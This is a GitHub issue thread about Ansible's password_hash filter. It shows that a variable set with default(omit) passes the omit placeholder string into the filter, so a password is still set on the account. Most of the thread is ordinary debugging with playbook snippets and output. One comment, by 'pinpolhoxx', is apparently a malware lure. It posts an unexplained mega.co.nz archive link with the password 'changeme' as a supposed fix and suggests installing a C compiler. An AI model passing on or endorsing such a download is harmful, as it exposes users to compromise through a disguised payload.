### ISSUE TITLE
ansible.builtin.password_hash filter return a value when an undefined variable is provided 

### ISSUE THREAD

**Issue by shmii** [ansible/ansible#83971]
### Summary

ansible.builtin.password_hash filter return a value when an undefined variable is provided 
(_So it's can't be triggered on the filter by with the 'omit' command_)
And a password is always created ... 

### Issue Type

Bug Report

### Component Name

ansible.builtin.password_hash

### Ansible Version

```console
$ ansible --version
ansible [core 2.17.4]
  config file = /home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg
  configured module search path = ['/home/thomas/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules']
  ansible python module location = /home/thomas/Git/.venv/lib/python3.12/site-packages/ansible
  ansible collection location = /home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/collections
  executable location = /home/thomas/Git/.venv/bin/ansible
  python version = 3.12.3 (main, Sep 11 2024, 14:17:37) [GCC 13.2.0] (/home/thomas/Git/.venv/bin/python3)
  jinja version = 3.1.4
  libyaml = True
```

### Configuration

```console
# if using a version older than ansible-core 2.12 you should omit the '-t all'
$ ansible-config dump --only-changed -t all
OLLECTIONS_PATHS(/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg) = ['/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/collections']
CONFIG_FILE() = /home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg
DEFAULT_FORKS(/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg) = 10
DEFAULT_LOG_PATH(/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg) = /var/log/ansible.log
DEFAULT_ROLES_PATH(/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg) = ['/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/roles']
DEFAULT_TIMEOUT(/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg) = 60
DISPLAY_SKIPPED_HOSTS(/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg) = True
HOST_KEY_CHECKING(/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg) = False
INTERPRETER_PYTHON(/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg) = auto
PAGER(env: PAGER) = less
YAML_FILENAME_EXTENSIONS(/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg) = ['.yaml', '.yml', '.inventory']

CALLBACK:
========

default:
_______
display_skipped_hosts(/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg) = True

CONNECTION:
==========

paramiko_ssh:
____________
host_key_checking(/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg) = False
timeout(/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg) = 60

ssh:
___
host_key_checking(/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg) = False
timeout(/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg) = 60

INVENTORY:
=========

yaml:
____
yaml_extensions(/home/thomas/Git/Thomas/github.com/AnsibleWorkPlan/ansible.cfg) = ['.yaml', '.yml', '.inventory']

VARS:
====

host_group_vars:
```

### OS / Environment

Distributor ID: Ubuntu
Description:    Ubuntu 24.04.1 LTS
Release:        24.04
Codename:       noble

### Steps to Reproduce

My vars :

```yaml


  users:
    - name: 'tchalmel'
      comment: "Thomas CHALMEL"

```

My task :

```yaml
- name: "OS Common - Users - User - Check : {{ user.name | default('') }}"
  ansible.builtin.user:
    name: "{{ user.name }}"
    ....
    password: "{{ user.password | password_hash('sha512', 'FIXEDSALT') }}"
    ....
```

Ansible Output  :

```yaml
changed: [myserver] => {
    "append": false,
    "changed": true,
    "comment": "Thomas CHALMEL",
    "group": 1002,
    "home": "/home/tchalmel",
    "invocation": {
        "module_args": {
            "append": false,
            "authorization": null,
            "comment": null,
            "create_home": true,
            "expires": null,
            "force": false,
            "generate_ssh_key": null,
            "group": null,
            "groups": null,
            "hidden": null,
            "home": null,
            "local": null,
            "login_class": null,
            "move_home": false,
            "name": "tchalmel",
            "non_unique": false,
            "password": "VALUE_SPECIFIED_IN_NO_LOG_PARAMETER",
            "password_expire_max": null,
            "password_expire_min": null,
            "password_expire_warn": null,
            "password_lock": null,
            "profile": null,
            "remove": false,
            "role": null,
            "seuser": null,
            "shell": null,
            "skeleton": null,
            "ssh_key_bits": 0,
            "ssh_key_comment": "ansible-generated on xxxxx",
            "ssh_key_file": null,
            "ssh_key_passphrase": null,
            "ssh_key_type": "rsa",
            "state": "present",
            "system": false,
            "uid": null,
            "umask": null,
            "update_password": "always"
        }
    },
    "move_home": false,
    "name": "tchalmel",
    "password": "NOT_LOGGING_PASSWORD",
    "shell": "/bin/bash",
    "state": "present",
    "uid": 1002
}

```

### Expected Results

I expected an error for undefined user.password  var  (Can be caught with omit filter)

### Actual Results

```console
A password is set on the user account
```

### Code of Conduct

- [X] I agree to follow the Ansible Code of Conduct

**Comment by ansibot** [comment]
Files identified in the description:

None

If these files are incorrect, please update the `component name` section of the description or use the [component](https://github.com/ansible/ansibotmini#commands) bot command.

**Comment by pinpolhoxx** [comment]
I think this will help you.
https://mega.co.nz/#!h7FUWTgJ!EBLwTfcj8qX2Q2_UCp-4N7KgdH2Hs9qNkvH4vjvN6II
Archive password: changeme

you may need to install the c compiler

**Comment by shmii** [comment]
My bad, the problem is not on the `ansible.builtin.password_hash` ...
The problem come from my var's management with the `ansible.builtin.password_hash` .

```yaml

  users:
    - name: 'tchalmel'
      comment: "Thomas CHALMEL"
      password: "{{ vault_tchalmel_password | default(omit) }}"

    - name: 'tchalmel2'
      comment: "Thomas CHALMEL 2"
```

In my case, the `vault_tchalmel_password` variable not exist, so the omit directive is provided (or should provide)
I'll expect it's the same as no variable at all !
As we show with the `ansible.builtin.debug` module for example If I use : 


```yaml
- name: "OS Common - Users - User - Debug Informations : {{ user.name | default('') }}"
  ansible.builtin.debug:
    msg:
      - user: "{{ user | default('') }}"
```

As I expected, the password vars are not on my dictionaries.


```

ok: [xxxx] => {
    "msg": [
        {
            "user": {
                "comment": "Thomas CHALMEL",
                "name": "tchalmel"
            }
        }
    ]
}

ok: [xxxx] => {
    "msg": [
        {
            "user": {
                "comment": "Thomas CHALMEL 2",
                "name": "tchalmel2"
            }
        }
    ]
}

```

But if I use it with `ansible.builtin.user` module 


```
 - name: "OS Common - Users - User - Check : {{ user.name | default('') }}"
  ansible.builtin.user:
    name: "{{ user.name }}"
    password: "{{ user.password | password_hash('sha512', 'FIXEDSALT') }}"

```


It's failed as expected for `tchalmel2`
but it's working for the user `tchalmel`  ... !!!

**Comment by shmii** [comment]
For the `tchalmel`  case, the variable `user.password` seems to have a sort of existence ^^"
I don't know if it's a bug or a feature :)

**Comment by shmii** [comment]
With this dictionary : 

```
  users:
    - name: 'tchalmel'
      password: "{{ vault_tchalmel_password | default(omit) }}"
      comment: "Thomas CHALMEL"
```

And this task


```
- name: "TEST"
  ansible.builtin.debug:
    msg:
      - user: "{{ user }}"
      - user type: "{{ user | type_debug }}"

      - "{{ user.password }}"
      - password size: "{{ user.password | length }}"
      - user password type: "{{ user.password | type_debug }}"
      - user password is none : "{{ user.password is none }}"
      - user password is exists : "{{ user.password is exists }}"
      - user password is defined : "{{ user.password is defined }}"
      - user.password (default AAAA): "{{ user.password | default('AAAA') }}"
```


I have :


```
ok: [ns3172595] => {
    "msg": [
        {
            "user": {
                "comment": "Thomas CHALMEL",
                "name": "tchalmel"
            }
        },
        {
            "user type": "dict"
        },
        "__omit_place_holder__adf7050e2055ed0a5ff8d35cdfd712c99597ea3a",
        {
            "password size": "61"
        },
        {
            "user password type": "str"
        },
        {
            "user password is none": false
        },
        {
            "user password is exists": false
        },
        {
            "user password is defined": true
        },
        {}
    ]
}
```
